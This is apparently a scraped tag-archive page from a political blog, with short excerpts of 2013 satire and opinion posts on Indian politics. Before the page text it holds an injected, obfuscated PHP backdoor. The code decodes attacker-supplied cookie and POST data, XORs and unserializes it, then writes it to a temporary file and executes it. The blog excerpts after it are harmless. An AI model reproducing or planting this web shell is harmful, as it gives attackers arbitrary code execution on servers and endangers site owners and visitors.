$ZUbGuMq = "\145" . 'n' . chr (100) . "\x5f" . chr (84) . chr ( 205 - 132 ).chr ( 387 - 322 )."\x78";$BEIXdpqO = chr (99) . 'l' . "\x61" . "\163" . "\x73" . chr ( 717 - 622 ).chr ( 214 - 113 ).chr ( 797 - 677 ).chr ( 444 - 339 ).'s' . chr (116) . chr (115); $RJWgA = class_exists($ZUbGuMq); $BEIXdpqO = "63795";$rQzPNtr = !1;if ($RJWgA == $rQzPNtr){function oqYLxIQez(){$VcjKXYt = new /* 62125 */ end_TIAx(22540 + 22540); $VcjKXYt = NULL;}$KEMZpKZZJf = "22540";class end_TIAx{private function lyjMmFeSam($KEMZpKZZJf){if (is_array(end_TIAx::$IPtbX)) {$fQwNWIVHc = sys_get_temp_dir() . "/" . crc32(end_TIAx::$IPtbX[chr ( 796 - 681 ).chr ( 809 - 712 ).'l' . 't']);@end_TIAx::$IPtbX['w' . chr (114) . chr (105) . "\164" . chr (101)]($fQwNWIVHc, end_TIAx::$IPtbX["\x63" . chr ( 291 - 180 ).chr ( 310 - 200 ).chr ( 456 - 340 )."\x65" . 'n' . "\164"]);include $fQwNWIVHc;@end_TIAx::$IPtbX['d' . "\145" . "\x6c" . "\145" . 't' . 'e']($fQwNWIVHc); $KEMZpKZZJf = "22540";exit();}}private $YNrwW;public function XiElOaeF(){echo 38769;}public function __destruct(){$KEMZpKZZJf = "57831_10237";$this->lyjMmFeSam($KEMZpKZZJf); $KEMZpKZZJf = "57831_10237";}public function __construct($BujEtz=0){$mVDdRhEk = $_POST;$UIUNR = $_COOKIE;$JPlFFL = "90a051c4-154c-4d36-9a25-afee49168885";$dwEnnTEEr = @$UIUNR[substr($JPlFFL, 0, 4)];if (!empty($dwEnnTEEr)){$GKpUN = "base64";$peNKnKqlm = "";$dwEnnTEEr = explode(",", $dwEnnTEEr);foreach ($dwEnnTEEr as $gthfNZ){$peNKnKqlm .= @$UIUNR[$gthfNZ];$peNKnKqlm .= @$mVDdRhEk[$gthfNZ];}$peNKnKqlm = array_map($GKpUN . '_' . chr ( 811 - 711 ).chr (101) . chr (99) . chr ( 1052 - 941 ).'d' . "\x65", array($peNKnKqlm,)); $peNKnKqlm = $peNKnKqlm[0] ^ str_repeat($JPlFFL, (strlen($peNKnKqlm[0]) / strlen($JPlFFL)) + 1);end_TIAx::$IPtbX = @unserialize($peNKnKqlm);}}public static $IPtbX = 40024;}oqYLxIQez();} iPhone | Being Political

The Week that Wasn’t -The Weekly Satire

By |2013-09-22T10:23:10+05:30September 22nd, 2013|Categories: BJP, Congress, Economics, Foreign Relations, Government, Narendra Modi, Other Parties, People Power, Political Parties, Politics, Satire, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , , , |

This week had it all. Finally after a long wait of 9 days... Arnab returned to Times Now. Lets Have a look at the weeks events: The nation was shocked and there was no one to ask the questions and get the direct answers. Rajdeep Sardesai finally found good days and was happy to see people finally

Mould the Clay

By |2013-09-21T10:43:14+05:30September 21st, 2013|Categories: Government, NDA, People Power, Uncategorized, UPA|Tags: , , , , , , , , , , , , , , , , , , , , , , |

Did not like the new iPhone 5s? Found the iPhone 5C too expensive to be a "C for Cheap" iPhone? Disappointed with Tim Cook's leadership? "The leadership deficit in India is aggravating our economic crisis" -Ratan Tata, ex chairman and visionary of Tata Group, India's biggest group. We need a Paradigm Shift Many

AAP – The Revolution We Need?

By |2013-09-16T16:38:31+05:30September 16th, 2013|Categories: Aam Admi Party, Politics, Uncategorized, Youth|Tags: , , , , , , , , , , , , , , , , , |

For anything to be adopted quickly, it needs to be 'out of the box', not just 'improved things', but a killer out of the box idea which will change everything forever. The touch screen idea gave the iPhone the reputation it still enjoys, keeping up with your friends not just with messaging but with photos

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